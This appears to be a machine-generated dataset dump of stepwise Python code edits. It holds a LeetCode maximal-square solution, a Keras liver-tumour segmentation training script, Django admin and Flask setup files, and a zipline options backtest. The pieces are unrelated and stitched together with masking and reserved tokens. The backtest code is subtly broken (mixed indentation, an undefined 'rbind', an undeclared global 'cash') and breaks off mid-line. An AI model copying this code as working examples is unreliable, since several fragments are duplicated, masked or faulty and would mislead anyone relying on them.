"step-4": "\"\"\"\nGiven a 2D binary matrix filled with 0's and 1's, find the largest square containing only 1's and return its area.\n\nExample:\n\nInput: \n\n1 0 1 0 0\n1 0 1 1 1\n1 1 1 1 1\n1 0 0 1 0\n\nOutput: 4\n\"\"\"\n# 196ms. 98 percentile\nclass Solution:\n def maximalSquare(self, matrix: List[List[str]]) -> int:\n if not matrix:\n return 0\n dp = [0]*(len(matrix[0]) + 1)\n longestSide = 0\n for i in range(len(matrix)):\n prevSquare =0\n for j in range(len(matrix[0])):\n temp = dp[j]\n if matrix[i][j] == '1':\n dp[j] = 1 + min(dp[j], dp[j-1], prevSquare)\n longestSide = max(longestSide, dp[j])\n else:\n dp[j] = 0\n \n prevSquare = temp\n \n return longestSide*longestSide\n\n\n\"\"\"\nNotes:\n\nTwo hard things in this problem. The first is the logic for the dp, although after the fact \nit seems pretty straightforward imo.\nAt any element you can check if you have a 2 by 2 square by looking at its neighbors. So anywhere you see\n1 1\n1 1\nyou're going to replace the bottom right corner with a 2. Note we're going top down and left to right...\nSo if you see\n2 2\n2 1 \n...then you know that you actually have\n1 1 1\n1 2 2\n1 2 1\nmeaning you can actually put 3 in the corner. \n\nOn the other hand, if any of the neighbors are 1's, then you won't have the full cube. Implying that\nat each spot, if it's a 1, you take the min of the three neighbors + 1. \n\n\nThe second hard thing is just dealing with the fact the input is characters not ints...annoying imo. The second\nsolution up there just uses a standard 1d dp array to keep track of the last row processed in terms of ints...which\nis all we need. So we can avoid casting anything. \n\nThe first solution only casts the first first row and the first column. \n\nMost of it is straightforwards. The one thing I want to note is that temp variable switch. Basically because our dp is\na single array, when we're processing element i, we've already replaced element i-1 with an updated value. That's a problem\nbecause the i-1 value represents the j-1,i-1 value for the ith element in the dp. So we use that little temp switch to \nskirt the issue. \n\"\"\"",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def train():
batch_size = 4
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
trainGene = trainGenerator(batch_size, data_path='/data', folder=
'train', aug_dict=aug_args, seed=1, interaction='RECIST')
devGene = trainGenerator(batch_size, data_path='/data', folder='dev',
aug_dict=no_aug_args, seed=1, interaction='RECIST')
testGene = testGenerator(test_path='test_path', interaction='RECIST')
model = CGBS_Net(input_shape=(256, 256, 4), rate=3)
model.summary()
opt = SGD(lr=0.0004, decay=1e-06, momentum=0.9, nesterov=True)
lr_metric = get_lr_metric(opt)
model.compile(optimizer=opt, loss={'out_seg': dice_coef_loss,
'out_shape': losses.binary_crossentropy}, loss_weights={'out_seg':
1, 'out_shape': 1}, metrics=[dice_coef, lr_metric])
csv_logger = CSVLogger('./Models/' + 'CGBS_Net.csv', append=True)
model_checkpoint = ModelCheckpoint(
'./Models/CGBS/{epoch:02d}-{val_out_seg_dice_coef:.4f}.h5', monitor
='val_out_seg_loss', verbose=0, save_best_only=True,
save_weights_only=True, mode='auto', period=1)
reduce_lr = ReduceLROnPlateau(monitor='val_out_seg_loss', factor=0.1,
patience=50, mode='auto')
model.fit_generator(generator=trainGene, steps_per_epoch=int(5000 /
batch_size), epochs=500, validation_data=devGene, validation_steps=
int(5000 / batch_size), verbose=2, callbacks=[model_checkpoint,
csv_logger, reduce_lr])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_lr_metric(optimizer):
def lr(y_true, y_pred):
return optimizer.lr
return lr
def train():
batch_size = 4
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
trainGene = trainGenerator(batch_size, data_path='/data', folder=
'train', aug_dict=aug_args, seed=1, interaction='RECIST')
devGene = trainGenerator(batch_size, data_path='/data', folder='dev',
aug_dict=no_aug_args, seed=1, interaction='RECIST')
testGene = testGenerator(test_path='test_path', interaction='RECIST')
model = CGBS_Net(input_shape=(256, 256, 4), rate=3)
model.summary()
opt = SGD(lr=0.0004, decay=1e-06, momentum=0.9, nesterov=True)
lr_metric = get_lr_metric(opt)
model.compile(optimizer=opt, loss={'out_seg': dice_coef_loss,
'out_shape': losses.binary_crossentropy}, loss_weights={'out_seg':
1, 'out_shape': 1}, metrics=[dice_coef, lr_metric])
csv_logger = CSVLogger('./Models/' + 'CGBS_Net.csv', append=True)
model_checkpoint = ModelCheckpoint(
'./Models/CGBS/{epoch:02d}-{val_out_seg_dice_coef:.4f}.h5', monitor
='val_out_seg_loss', verbose=0, save_best_only=True,
save_weights_only=True, mode='auto', period=1)
reduce_lr = ReduceLROnPlateau(monitor='val_out_seg_loss', factor=0.1,
patience=50, mode='auto')
model.fit_generator(generator=trainGene, steps_per_epoch=int(5000 /
batch_size), epochs=500, validation_data=devGene, validation_steps=
int(5000 / batch_size), verbose=2, callbacks=[model_checkpoint,
csv_logger, reduce_lr])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_lr_metric(optimizer):
def lr(y_true, y_pred):
return optimizer.lr
return lr
def train():
batch_size = 4
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
trainGene = trainGenerator(batch_size, data_path='/data', folder=
'train', aug_dict=aug_args, seed=1, interaction='RECIST')
devGene = trainGenerator(batch_size, data_path='/data', folder='dev',
aug_dict=no_aug_args, seed=1, interaction='RECIST')
testGene = testGenerator(test_path='test_path', interaction='RECIST')
model = CGBS_Net(input_shape=(256, 256, 4), rate=3)
model.summary()
opt = SGD(lr=0.0004, decay=1e-06, momentum=0.9, nesterov=True)
lr_metric = get_lr_metric(opt)
model.compile(optimizer=opt, loss={'out_seg': dice_coef_loss,
'out_shape': losses.binary_crossentropy}, loss_weights={'out_seg':
1, 'out_shape': 1}, metrics=[dice_coef, lr_metric])
csv_logger = CSVLogger('./Models/' + 'CGBS_Net.csv', append=True)
model_checkpoint = ModelCheckpoint(
'./Models/CGBS/{epoch:02d}-{val_out_seg_dice_coef:.4f}.h5', monitor
='val_out_seg_loss', verbose=0, save_best_only=True,
save_weights_only=True, mode='auto', period=1)
reduce_lr = ReduceLROnPlateau(monitor='val_out_seg_loss', factor=0.1,
patience=50, mode='auto')
model.fit_generator(generator=trainGene, steps_per_epoch=int(5000 /
batch_size), epochs=500, validation_data=devGene, validation_steps=
int(5000 / batch_size), verbose=2, callbacks=[model_checkpoint,
csv_logger, reduce_lr])
train()
<|reserved_special_token_1|>
from liver_tumor_segmentation.CGBS_Net import *
from liver_tumor_segmentation.loss import *
from keras.optimizers import *
from liver_tumor_segmentation.CGBS_data_generator import *
from keras.callbacks import *
import os
from keras.callbacks import ReduceLROnPlateau
from keras import losses
from configuration import *
def get_lr_metric(optimizer):
def lr(y_true, y_pred):
return optimizer.lr
return lr
def train():
batch_size = 4
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
trainGene = trainGenerator(batch_size, data_path='/data', folder=
'train', aug_dict=aug_args, seed=1, interaction='RECIST')
devGene = trainGenerator(batch_size, data_path='/data', folder='dev',
aug_dict=no_aug_args, seed=1, interaction='RECIST')
testGene = testGenerator(test_path='test_path', interaction='RECIST')
model = CGBS_Net(input_shape=(256, 256, 4), rate=3)
model.summary()
opt = SGD(lr=0.0004, decay=1e-06, momentum=0.9, nesterov=True)
lr_metric = get_lr_metric(opt)
model.compile(optimizer=opt, loss={'out_seg': dice_coef_loss,
'out_shape': losses.binary_crossentropy}, loss_weights={'out_seg':
1, 'out_shape': 1}, metrics=[dice_coef, lr_metric])
csv_logger = CSVLogger('./Models/' + 'CGBS_Net.csv', append=True)
model_checkpoint = ModelCheckpoint(
'./Models/CGBS/{epoch:02d}-{val_out_seg_dice_coef:.4f}.h5', monitor
='val_out_seg_loss', verbose=0, save_best_only=True,
save_weights_only=True, mode='auto', period=1)
reduce_lr = ReduceLROnPlateau(monitor='val_out_seg_loss', factor=0.1,
patience=50, mode='auto')
model.fit_generator(generator=trainGene, steps_per_epoch=int(5000 /
batch_size), epochs=500, validation_data=devGene, validation_steps=
int(5000 / batch_size), verbose=2, callbacks=[model_checkpoint,
csv_logger, reduce_lr])
train()
<|reserved_special_token_1|>
from liver_tumor_segmentation.CGBS_Net import *
from liver_tumor_segmentation.loss import *
from keras.optimizers import *
from liver_tumor_segmentation.CGBS_data_generator import *
from keras.callbacks import *
import os
from keras.callbacks import ReduceLROnPlateau
from keras import losses
from configuration import *
def get_lr_metric(optimizer):
def lr(y_true, y_pred):
return optimizer.lr
return lr
def train():
batch_size = 4 #4 for single GPU; 8 for two GPUs
os.environ["CUDA_VISIBLE_DEVICES"] = '0'
trainGene = trainGenerator(batch_size, data_path='/data',
folder='train', aug_dict=aug_args, seed = 1, interaction='RECIST')
devGene = trainGenerator(batch_size, data_path='/data',
folder='dev', aug_dict=no_aug_args, seed = 1, interaction='RECIST')
testGene = testGenerator(test_path='test_path', interaction='RECIST')
model = CGBS_Net(input_shape=(256, 256, 4),rate=3)
model.summary()
# GPU_COUNT = 2
# model = multi_gpu_model(original_model, GPU_COUNT)
opt=SGD(lr=4e-4, decay=1e-6, momentum=0.9, nesterov=True)
lr_metric = get_lr_metric(opt)
model.compile(optimizer=opt, loss={'out_seg': dice_coef_loss, 'out_shape': losses.binary_crossentropy},
loss_weights={'out_seg': 1, 'out_shape': 1}, metrics=[dice_coef, lr_metric])
csv_logger = CSVLogger('./Models/'+'CGBS_Net.csv', append=True) # ss-0.01
# tensorboard = TensorBoard(log_dir='./tmp/graph', write_graph=True, write_images=True)
# earlystopping = EarlyStopping(monitor='val_loss', patience=0, verbose=0, mode='auto')
model_checkpoint = ModelCheckpoint(
'./Models/CGBS/{epoch:02d}-{val_out_seg_dice_coef:.4f}.h5',
monitor='val_out_seg_loss',
verbose=0, save_best_only=True, save_weights_only=True, mode='auto', period=1)
reduce_lr = ReduceLROnPlateau(monitor='val_out_seg_loss', factor=0.1, patience=50, mode='auto')
model.fit_generator(generator=trainGene, steps_per_epoch=int(5000/batch_size),
epochs=500, validation_data=devGene,
validation_steps=int(5000/batch_size), verbose=2,
callbacks=[model_checkpoint, csv_logger, reduce_lr])
train()
|
flexible
|
{
"blob_id": "8c17f2c770c24bbf8c73628c6740c0b866e6b1c0",
"index": 9047,
"step-1": "<mask token>\n\n\ndef train():\n batch_size = 4\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n trainGene = trainGenerator(batch_size, data_path='/data', folder=\n 'train', aug_dict=aug_args, seed=1, interaction='RECIST')\n devGene = trainGenerator(batch_size, data_path='/data', folder='dev',\n aug_dict=no_aug_args, seed=1, interaction='RECIST')\n testGene = testGenerator(test_path='test_path', interaction='RECIST')\n model = CGBS_Net(input_shape=(256, 256, 4), rate=3)\n model.summary()\n opt = SGD(lr=0.0004, decay=1e-06, momentum=0.9, nesterov=True)\n lr_metric = get_lr_metric(opt)\n model.compile(optimizer=opt, loss={'out_seg': dice_coef_loss,\n 'out_shape': losses.binary_crossentropy}, loss_weights={'out_seg': \n 1, 'out_shape': 1}, metrics=[dice_coef, lr_metric])\n csv_logger = CSVLogger('./Models/' + 'CGBS_Net.csv', append=True)\n model_checkpoint = ModelCheckpoint(\n './Models/CGBS/{epoch:02d}-{val_out_seg_dice_coef:.4f}.h5', monitor\n ='val_out_seg_loss', verbose=0, save_best_only=True,\n save_weights_only=True, mode='auto', period=1)\n reduce_lr = ReduceLROnPlateau(monitor='val_out_seg_loss', factor=0.1,\n patience=50, mode='auto')\n model.fit_generator(generator=trainGene, steps_per_epoch=int(5000 /\n batch_size), epochs=500, validation_data=devGene, validation_steps=\n int(5000 / batch_size), verbose=2, callbacks=[model_checkpoint,\n csv_logger, reduce_lr])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_lr_metric(optimizer):\n\n def lr(y_true, y_pred):\n return optimizer.lr\n return lr\n\n\ndef train():\n batch_size = 4\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n trainGene = trainGenerator(batch_size, data_path='/data', folder=\n 'train', aug_dict=aug_args, seed=1, interaction='RECIST')\n devGene = trainGenerator(batch_size, data_path='/data', folder='dev',\n aug_dict=no_aug_args, seed=1, interaction='RECIST')\n testGene = testGenerator(test_path='test_path', interaction='RECIST')\n model = CGBS_Net(input_shape=(256, 256, 4), rate=3)\n model.summary()\n opt = SGD(lr=0.0004, decay=1e-06, momentum=0.9, nesterov=True)\n lr_metric = get_lr_metric(opt)\n model.compile(optimizer=opt, loss={'out_seg': dice_coef_loss,\n 'out_shape': losses.binary_crossentropy}, loss_weights={'out_seg': \n 1, 'out_shape': 1}, metrics=[dice_coef, lr_metric])\n csv_logger = CSVLogger('./Models/' + 'CGBS_Net.csv', append=True)\n model_checkpoint = ModelCheckpoint(\n './Models/CGBS/{epoch:02d}-{val_out_seg_dice_coef:.4f}.h5', monitor\n ='val_out_seg_loss', verbose=0, save_best_only=True,\n save_weights_only=True, mode='auto', period=1)\n reduce_lr = ReduceLROnPlateau(monitor='val_out_seg_loss', factor=0.1,\n patience=50, mode='auto')\n model.fit_generator(generator=trainGene, steps_per_epoch=int(5000 /\n batch_size), epochs=500, validation_data=devGene, validation_steps=\n int(5000 / batch_size), verbose=2, callbacks=[model_checkpoint,\n csv_logger, reduce_lr])\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_lr_metric(optimizer):\n\n def lr(y_true, y_pred):\n return optimizer.lr\n return lr\n\n\ndef train():\n batch_size = 4\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n trainGene = trainGenerator(batch_size, data_path='/data', folder=\n 'train', aug_dict=aug_args, seed=1, interaction='RECIST')\n devGene = trainGenerator(batch_size, data_path='/data', folder='dev',\n aug_dict=no_aug_args, seed=1, interaction='RECIST')\n testGene = testGenerator(test_path='test_path', interaction='RECIST')\n model = CGBS_Net(input_shape=(256, 256, 4), rate=3)\n model.summary()\n opt = SGD(lr=0.0004, decay=1e-06, momentum=0.9, nesterov=True)\n lr_metric = get_lr_metric(opt)\n model.compile(optimizer=opt, loss={'out_seg': dice_coef_loss,\n 'out_shape': losses.binary_crossentropy}, loss_weights={'out_seg': \n 1, 'out_shape': 1}, metrics=[dice_coef, lr_metric])\n csv_logger = CSVLogger('./Models/' + 'CGBS_Net.csv', append=True)\n model_checkpoint = ModelCheckpoint(\n './Models/CGBS/{epoch:02d}-{val_out_seg_dice_coef:.4f}.h5', monitor\n ='val_out_seg_loss', verbose=0, save_best_only=True,\n save_weights_only=True, mode='auto', period=1)\n reduce_lr = ReduceLROnPlateau(monitor='val_out_seg_loss', factor=0.1,\n patience=50, mode='auto')\n model.fit_generator(generator=trainGene, steps_per_epoch=int(5000 /\n batch_size), epochs=500, validation_data=devGene, validation_steps=\n int(5000 / batch_size), verbose=2, callbacks=[model_checkpoint,\n csv_logger, reduce_lr])\n\n\ntrain()\n",
"step-4": "from liver_tumor_segmentation.CGBS_Net import *\nfrom liver_tumor_segmentation.loss import *\nfrom keras.optimizers import *\nfrom liver_tumor_segmentation.CGBS_data_generator import *\nfrom keras.callbacks import *\nimport os\nfrom keras.callbacks import ReduceLROnPlateau\nfrom keras import losses\nfrom configuration import *\n\n\ndef get_lr_metric(optimizer):\n\n def lr(y_true, y_pred):\n return optimizer.lr\n return lr\n\n\ndef train():\n batch_size = 4\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n trainGene = trainGenerator(batch_size, data_path='/data', folder=\n 'train', aug_dict=aug_args, seed=1, interaction='RECIST')\n devGene = trainGenerator(batch_size, data_path='/data', folder='dev',\n aug_dict=no_aug_args, seed=1, interaction='RECIST')\n testGene = testGenerator(test_path='test_path', interaction='RECIST')\n model = CGBS_Net(input_shape=(256, 256, 4), rate=3)\n model.summary()\n opt = SGD(lr=0.0004, decay=1e-06, momentum=0.9, nesterov=True)\n lr_metric = get_lr_metric(opt)\n model.compile(optimizer=opt, loss={'out_seg': dice_coef_loss,\n 'out_shape': losses.binary_crossentropy}, loss_weights={'out_seg': \n 1, 'out_shape': 1}, metrics=[dice_coef, lr_metric])\n csv_logger = CSVLogger('./Models/' + 'CGBS_Net.csv', append=True)\n model_checkpoint = ModelCheckpoint(\n './Models/CGBS/{epoch:02d}-{val_out_seg_dice_coef:.4f}.h5', monitor\n ='val_out_seg_loss', verbose=0, save_best_only=True,\n save_weights_only=True, mode='auto', period=1)\n reduce_lr = ReduceLROnPlateau(monitor='val_out_seg_loss', factor=0.1,\n patience=50, mode='auto')\n model.fit_generator(generator=trainGene, steps_per_epoch=int(5000 /\n batch_size), epochs=500, validation_data=devGene, validation_steps=\n int(5000 / batch_size), verbose=2, callbacks=[model_checkpoint,\n csv_logger, reduce_lr])\n\n\ntrain()\n",
"step-5": "from liver_tumor_segmentation.CGBS_Net import *\r\nfrom liver_tumor_segmentation.loss import *\r\nfrom keras.optimizers import *\r\nfrom liver_tumor_segmentation.CGBS_data_generator import *\r\nfrom keras.callbacks import *\r\nimport os\r\nfrom keras.callbacks import ReduceLROnPlateau\r\nfrom keras import losses\r\nfrom configuration import *\r\n\r\ndef get_lr_metric(optimizer):\r\n def lr(y_true, y_pred):\r\n return optimizer.lr\r\n\r\n return lr\r\ndef train():\r\n batch_size = 4 #4 for single GPU; 8 for two GPUs\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = '0'\r\n\r\n trainGene = trainGenerator(batch_size, data_path='/data',\r\n folder='train', aug_dict=aug_args, seed = 1, interaction='RECIST')\r\n devGene = trainGenerator(batch_size, data_path='/data',\r\n folder='dev', aug_dict=no_aug_args, seed = 1, interaction='RECIST')\r\n testGene = testGenerator(test_path='test_path', interaction='RECIST')\r\n\r\n model = CGBS_Net(input_shape=(256, 256, 4),rate=3)\r\n model.summary()\r\n\r\n # GPU_COUNT = 2\r\n # model = multi_gpu_model(original_model, GPU_COUNT)\r\n\r\n opt=SGD(lr=4e-4, decay=1e-6, momentum=0.9, nesterov=True)\r\n lr_metric = get_lr_metric(opt)\r\n model.compile(optimizer=opt, loss={'out_seg': dice_coef_loss, 'out_shape': losses.binary_crossentropy},\r\n loss_weights={'out_seg': 1, 'out_shape': 1}, metrics=[dice_coef, lr_metric])\r\n\r\n csv_logger = CSVLogger('./Models/'+'CGBS_Net.csv', append=True) # ss-0.01\r\n # tensorboard = TensorBoard(log_dir='./tmp/graph', write_graph=True, write_images=True)\r\n # earlystopping = EarlyStopping(monitor='val_loss', patience=0, verbose=0, mode='auto')\r\n\r\n model_checkpoint = ModelCheckpoint(\r\n './Models/CGBS/{epoch:02d}-{val_out_seg_dice_coef:.4f}.h5',\r\n monitor='val_out_seg_loss',\r\n verbose=0, save_best_only=True, save_weights_only=True, mode='auto', period=1)\r\n reduce_lr = ReduceLROnPlateau(monitor='val_out_seg_loss', factor=0.1, patience=50, mode='auto')\r\n model.fit_generator(generator=trainGene, steps_per_epoch=int(5000/batch_size),\r\n epochs=500, validation_data=devGene,\r\n validation_steps=int(5000/batch_size), verbose=2,\r\n callbacks=[model_checkpoint, csv_logger, reduce_lr])\r\n\r\n\r\ntrain()\r\n\r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
__version__ = '3.13.7'
|
flexible
|
{
"blob_id": "01852f6dbeb78df3098b14d2f0538ad9193ea511",
"index": 9873,
"step-1": "<mask token>\n",
"step-2": "__version__ = '3.13.7'\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
<|reserved_special_token_0|>
class OrderInfoAdmin(admin.ModelAdmin):
list_display = 'ordernum', 'total', 'state'
search_fields = 'total',
list_filter = 'bpub_date',
actions = [make_published]
class address_infoAdmin(admin.ModelAdmin):
exclude = 'isDelete',
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def make_published(modeladmin, request, queryset):
queryset.update(state=1)
class OrderInfoAdmin(admin.ModelAdmin):
list_display = 'ordernum', 'total', 'state'
search_fields = 'total',
list_filter = 'bpub_date',
actions = [make_published]
class address_infoAdmin(admin.ModelAdmin):
exclude = 'isDelete',
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def make_published(modeladmin, request, queryset):
queryset.update(state=1)
class OrderInfoAdmin(admin.ModelAdmin):
list_display = 'ordernum', 'total', 'state'
search_fields = 'total',
list_filter = 'bpub_date',
actions = [make_published]
class address_infoAdmin(admin.ModelAdmin):
exclude = 'isDelete',
admin.site.register(cart)
admin.site.register(address_info, address_infoAdmin)
admin.site.register(OrderInfo, OrderInfoAdmin)
admin.site.register(OrderDetailInfo)
admin.site.register(GoodsInfo)
<|reserved_special_token_1|>
from django.contrib import admin
from models import *
def make_published(modeladmin, request, queryset):
queryset.update(state=1)
class OrderInfoAdmin(admin.ModelAdmin):
list_display = 'ordernum', 'total', 'state'
search_fields = 'total',
list_filter = 'bpub_date',
actions = [make_published]
class address_infoAdmin(admin.ModelAdmin):
exclude = 'isDelete',
admin.site.register(cart)
admin.site.register(address_info, address_infoAdmin)
admin.site.register(OrderInfo, OrderInfoAdmin)
admin.site.register(OrderDetailInfo)
admin.site.register(GoodsInfo)
<|reserved_special_token_1|>
#coding=utf-8
from django.contrib import admin
from models import *
#增加额外的方法
def make_published(modeladmin, request, queryset):
queryset.update(state=1)
class OrderInfoAdmin(admin.ModelAdmin):
list_display = ('ordernum', 'total', 'state')
search_fields = ('total', )
list_filter = ('bpub_date',)
actions = [make_published]
class address_infoAdmin(admin.ModelAdmin):
exclude = ('isDelete',)
#2017/1/05注册admin站点
admin.site.register(cart)
admin.site.register(address_info,address_infoAdmin)
admin.site.register(OrderInfo,OrderInfoAdmin)
admin.site.register(OrderDetailInfo)
admin.site.register(GoodsInfo)
|
flexible
|
{
"blob_id": "74a0282495bf4bbd34b397e0922074659a66d6ff",
"index": 4809,
"step-1": "<mask token>\n\n\nclass OrderInfoAdmin(admin.ModelAdmin):\n list_display = 'ordernum', 'total', 'state'\n search_fields = 'total',\n list_filter = 'bpub_date',\n actions = [make_published]\n\n\nclass address_infoAdmin(admin.ModelAdmin):\n exclude = 'isDelete',\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef make_published(modeladmin, request, queryset):\n queryset.update(state=1)\n\n\nclass OrderInfoAdmin(admin.ModelAdmin):\n list_display = 'ordernum', 'total', 'state'\n search_fields = 'total',\n list_filter = 'bpub_date',\n actions = [make_published]\n\n\nclass address_infoAdmin(admin.ModelAdmin):\n exclude = 'isDelete',\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef make_published(modeladmin, request, queryset):\n queryset.update(state=1)\n\n\nclass OrderInfoAdmin(admin.ModelAdmin):\n list_display = 'ordernum', 'total', 'state'\n search_fields = 'total',\n list_filter = 'bpub_date',\n actions = [make_published]\n\n\nclass address_infoAdmin(admin.ModelAdmin):\n exclude = 'isDelete',\n\n\nadmin.site.register(cart)\nadmin.site.register(address_info, address_infoAdmin)\nadmin.site.register(OrderInfo, OrderInfoAdmin)\nadmin.site.register(OrderDetailInfo)\nadmin.site.register(GoodsInfo)\n",
"step-4": "from django.contrib import admin\nfrom models import *\n\n\ndef make_published(modeladmin, request, queryset):\n queryset.update(state=1)\n\n\nclass OrderInfoAdmin(admin.ModelAdmin):\n list_display = 'ordernum', 'total', 'state'\n search_fields = 'total',\n list_filter = 'bpub_date',\n actions = [make_published]\n\n\nclass address_infoAdmin(admin.ModelAdmin):\n exclude = 'isDelete',\n\n\nadmin.site.register(cart)\nadmin.site.register(address_info, address_infoAdmin)\nadmin.site.register(OrderInfo, OrderInfoAdmin)\nadmin.site.register(OrderDetailInfo)\nadmin.site.register(GoodsInfo)\n",
"step-5": "#coding=utf-8\nfrom django.contrib import admin\nfrom models import *\n\n#增加额外的方法\ndef make_published(modeladmin, request, queryset):\n queryset.update(state=1)\n\nclass OrderInfoAdmin(admin.ModelAdmin):\n list_display = ('ordernum', 'total', 'state')\n search_fields = ('total', )\n list_filter = ('bpub_date',)\n actions = [make_published]\n\nclass address_infoAdmin(admin.ModelAdmin):\n exclude = ('isDelete',)\n\n\n#2017/1/05注册admin站点\nadmin.site.register(cart)\nadmin.site.register(address_info,address_infoAdmin)\nadmin.site.register(OrderInfo,OrderInfoAdmin)\nadmin.site.register(OrderDetailInfo)\nadmin.site.register(GoodsInfo)\n\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if __name__ == '__main__':
app.run(debug=app.config['DEBUG'])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
__author__ = '七月'
app = create_app()
if __name__ == '__main__':
app.run(debug=app.config['DEBUG'])
<|reserved_special_token_1|>
from app import create_app
__author__ = '七月'
app = create_app()
if __name__ == '__main__':
app.run(debug=app.config['DEBUG'])
|
flexible
|
{
"blob_id": "9a6d6637cd4ecf2f6e9c8eb8e702be06e83beea4",
"index": 998,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n app.run(debug=app.config['DEBUG'])\n",
"step-3": "<mask token>\n__author__ = '七月'\napp = create_app()\nif __name__ == '__main__':\n app.run(debug=app.config['DEBUG'])\n",
"step-4": "from app import create_app\n__author__ = '七月'\napp = create_app()\nif __name__ == '__main__':\n app.run(debug=app.config['DEBUG'])\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from zipline.api import (
# add_history,
history,
order_target_percent,
order,
record,
symbol,
get_datetime,
schedule_function,
)
from zipline.algorithm import TradingAlgorithm
from zipline.utils.factory import load_from_yahoo
import numpy as np
import pandas as pd
from datetime import datetime
cash = 0 # tracks the amount of money in the backtest
def initialize(context):
context.target_window = dict()
context.bought_options = dict()
# context.underlying = pd.read_csv('../data/underlying/FB.csv')
# context.underlying = pd.to_datetime(context.underlying['Date'])
context.options = pd.read_csv('../data/cleaned_data/FB.csv')
context.options['date'] = pd.to_datetime(context.options['date'])
context.options['expiration'] = pd.to_datetime(context.options['expiration'])
# (7) Trade (MODIFY SO THIS SHOULD ONLY HAPPEN ONCE A DAY)
def handle_data(context, data):
day_option_df = context.options[context.options['date'] == get_datetime()]
call_options = day_option_df[day_option_df['type'] == 'C']
################################## classifier stuff happens somewhere here
call_options_good = call_options # call_options_good is the classified call_options
##################################
# purchase the options that we think will end up in the money (could also modify this to give weight to it)
for index, row in call_options_good.iterrows():
context.bought_options = rbind(context.bought_options, row)
cash -= row['price']
# exercise expiring options that we've bought (assuming strike price is lower than expiration price)
expiring_calls = context.bought_options[context.bought_options['expiration'] == get_datetime()]
for index, row in expiring_calls.iterrows():
price = history(symbol(row['ticker']), '1d', 'price').iloc[0,0]
cash += 100*max(price - row['strike'], 0) # assuming 100:1 ratio equity:option
# need to add a way to plot cash data vs datetime
def add_to_window(context, window_size, datapoint, ticker):
tw = context.target_window[ticker]
tw.append(datapoint)
context.target_window[ticker] = tw[-window_size:] if len(tw) > window_size else tw
if __name__ == '__main__':
cash = 10000 # arbitrary amount
universe = ['FB'] # need to change the universe
data = load_from_yahoo(stocks=universe,
indexes={}, start=datetime(2016, 4, 3),
end=datetime.today())
olmar = TradingAlgorithm(initialize=initialize, handle_data=handle_data, capital_base=10000)
backtest = olmar.run(data)
backtest.to_csv('backtest-50-2012.csv')
print backtest['algorithm_period_return'][-1]
import pyfolio as pf
returns, positions, transactions, gross_lev = pf.utils.extract_rets_pos_txn_from_zipline(backtest)
pf.create_full_tear_sheet(returns, positions=positions, transactions=transactions, gross_lev=gross_lev, live_start_date='2004-10-22')
|
normal
|
{
"blob_id": "2e8737a48bd04ef5c158afb23dc94476ea790e18",
"index": 2074,
"step-1": "from zipline.api import (\r\n\t# add_history,\r\n\thistory,\r\n\torder_target_percent,\r\n\torder,\r\n\trecord,\r\n\tsymbol,\r\n\tget_datetime,\r\n\tschedule_function,\r\n)\r\nfrom zipline.algorithm import TradingAlgorithm\r\nfrom zipline.utils.factory import load_from_yahoo\r\nimport numpy as np \r\nimport pandas as pd \r\nfrom datetime import datetime \r\n\r\ncash = 0 # tracks the amount of money in the backtest\r\n\r\ndef initialize(context):\r\n\tcontext.target_window = dict()\r\n\tcontext.bought_options = dict()\r\n\r\n\t# context.underlying = pd.read_csv('../data/underlying/FB.csv')\r\n\t# context.underlying = pd.to_datetime(context.underlying['Date'])\r\n\r\n\tcontext.options = pd.read_csv('../data/cleaned_data/FB.csv')\r\n\tcontext.options['date'] = pd.to_datetime(context.options['date'])\r\n\tcontext.options['expiration'] = pd.to_datetime(context.options['expiration'])\r\n\r\n\r\n# (7) Trade (MODIFY SO THIS SHOULD ONLY HAPPEN ONCE A DAY)\r\ndef handle_data(context, data):\r\n\tday_option_df = context.options[context.options['date'] == get_datetime()]\r\n\tcall_options = day_option_df[day_option_df['type'] == 'C']\r\n\r\n\t################################## classifier stuff happens somewhere here\r\n\tcall_options_good = call_options # call_options_good is the classified call_options\r\n\t##################################\r\n\r\n\t# purchase the options that we think will end up in the money (could also modify this to give weight to it)\r\n\tfor index, row in call_options_good.iterrows():\r\n\t\tcontext.bought_options = rbind(context.bought_options, row)\r\n\t\tcash -= row['price']\r\n\r\n\t# exercise expiring options that we've bought (assuming strike price is lower than expiration price)\r\n\texpiring_calls = context.bought_options[context.bought_options['expiration'] == get_datetime()]\r\n\tfor index, row in expiring_calls.iterrows():\r\n\t\tprice = history(symbol(row['ticker']), '1d', 'price').iloc[0,0]\r\n cash += 100*max(price - row['strike'], 0) # assuming 100:1 ratio equity:option\r\n\r\n # need to add a way to plot cash data vs datetime\r\n\r\ndef add_to_window(context, window_size, datapoint, ticker):\r\n\ttw = context.target_window[ticker]\r\n\ttw.append(datapoint)\r\n\tcontext.target_window[ticker] = tw[-window_size:] if len(tw) > window_size else 